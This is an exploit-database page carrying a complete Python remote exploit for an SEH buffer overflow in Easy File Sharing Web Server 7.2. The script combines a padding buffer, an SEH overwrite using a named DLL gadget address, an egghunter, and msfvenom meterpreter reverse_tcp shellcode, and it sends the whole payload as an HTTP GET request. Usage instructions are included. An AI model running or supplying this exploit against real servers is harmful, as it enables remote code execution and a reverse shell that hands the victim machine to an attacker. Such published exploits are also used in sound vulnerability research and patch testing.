Easy File Sharing Web Server 7.2 SEH Buffer Overflow

2016.09.03
Credit: Iran Cyber Security Group
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-119

#!/usr/bin/python # Exploit Title: Easy File Sharing Web Server 7.2 SEH Buffer Overflow (EggHunter) # Date: 2016/8/31 # Exploit Author: Iran Cyber Security Group # Vendor Homepage: http://www.sharing-file.com # Software Link: http://www.sharing-file.com/efssetup.exe # Version: 7.2 [LATEST] # Tested on: Microsoft Windows 7 Professional x86 [Should Work On The Other Operating Systems] # CVE : N/A # Usage : python exploit.py [IP or Domain] # Discovered By Arash Khazaei (AKA XoDiAK) # Greetz To Iran Cyber Members & My Friends import sys,socket from struct import pack HOST = sys.argv[1] PORT = 80 # msfvenom -p windows/meterpreter/reverse_tcp -b '\x2f\x5c' -i 2 -f c 335 Byte # Replace It With Your Own Shellcode ! shellcode = ("w00tw00t" + "\xd9\xc9\xbf\x35\xfe\x35\x6e\xd9\x74\x24\xf4\x5e\x29\xc9\xb1" "\x4e\x31\x7e\x17\x83\xc6\x04\x03\x4b\xed\xd7\x9b\x6a\xff\xc1" "\x10\xa8\xf4\xa8\xf1\x79\x4b\x8d\xf4\xcf\x36\xbf\xbe\x1e\x4d" "\xd8\x43\x1a\xa9\x5b\x81\x1f\xdd\x18\x78\xb2\x84\x32\xfb\x61" "\x03\x6f\x9e\xe5\x0f\x3d\x70\x9b\xbb\xd1\x2e\x81\x1c\xa6\x79" "\x74\x27\x17\xde\x04\x4b\x10\x89\x6b\xd3\xe4\xc0\x6c\x47\x32" "\xf4\x44\xeb\x7e\x1e\xd7\x62\x4c\x56\x0f\x58\x2e\x1a\x12\xc9" "\x0e\x12\x81\x30\xc9\x30\x3c\x76\xc0\x7a\xc0\xe0\x3b\xba\x6f" "\xfc\x5b\xe3\x3f\x1c\xa6\x37\x3d\xf5\x6b\xf3\x1a\xe0\x82\x85" "\xc8\xee\xce\xc8\xa2\xf9\x0e\x84\xe3\xac\x36\xe6\x3b\xc0\xe7" "\x61\xc1\xd3\xef\xf1\x4e\xc3\xde\xfd\xc7\x77\x5b\x51\xbc\xab" "\x2d\xb9\x65\x03\xc1\x01\x47\xbe\x50\xe2\xfc\x96\x96\xab\xd3" "\xf8\x53\x15\x69\xc6\xcd\x34\xdb\xd3\xcd\xcc\xdd\x02\x24\x31" "\x9f\xc0\xce\x41\x53\xf0\xe0\xb1\xd7\x96\xfc\x16\xe4\x10\xba" "\xd0\xd0\x10\x02\x40\xdc\x33\x9d\xb5\x35\xbb\x3f\x4f\x93\x11" "\x9a\x16\x63\x1b\x60\xa1\xab\x5e\x05\xf2\x7c\x02\x57\x99\x90" "\x88\x4d\xcf\x60\x3a\x9f\x77\x8a\x9e\xff\x1c\x91\x61\xec\x5e" "\xd4\x08\x54\x76\xfb\xdb\x45\xda\x8f\x01\xba\xed\x01\xef\x09" "\xc1\x5d\x8f\x2b\x24\x69\xc0\xbf\x44\x03\x6e\x62\x7c\x39\x6a" "\xab\x18\x70\xe5\xff\xe6\x33\x3b\x2b\x37\xf1\xb3\x92\xd6\x59" "\xcc\xc8\xca\x8d\x9d\x34\xf9\x89\xf7\x26\xbc\x60\xa1\xdf\xcb" "\xa8\x9d\xd2\x9f\x33\x5a\x48\xb2\x8d\xc5\xaa\x9f\x3c\x37\x0b" "\x98\x35\x70\x3b\xe0") # Padding ! junk = "A" * 4061 # Next SEH nseh = "\xeb\x06\x90\x90" # 0x1000108b [ImageLoader.dll] POP POP RET seh = pack('<L', 0x10018848) # Egg Hunter 32 Byte Tag = w00tw00t egghunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74" "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7") exploit = junk + nseh + seh + egghunter + shellcode + "\x90"*(len(junk)-4-4-32-8-335-5000) try: s = socket.socket() s.connect((HOST, PORT)) s.send("GET " + exploit + " HTTP/1.0\r\n\r\n") s.close() except: print "Can't Connect To Web Server ! Is it up ?" print "Evil Buffer Sended Successfully!"


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top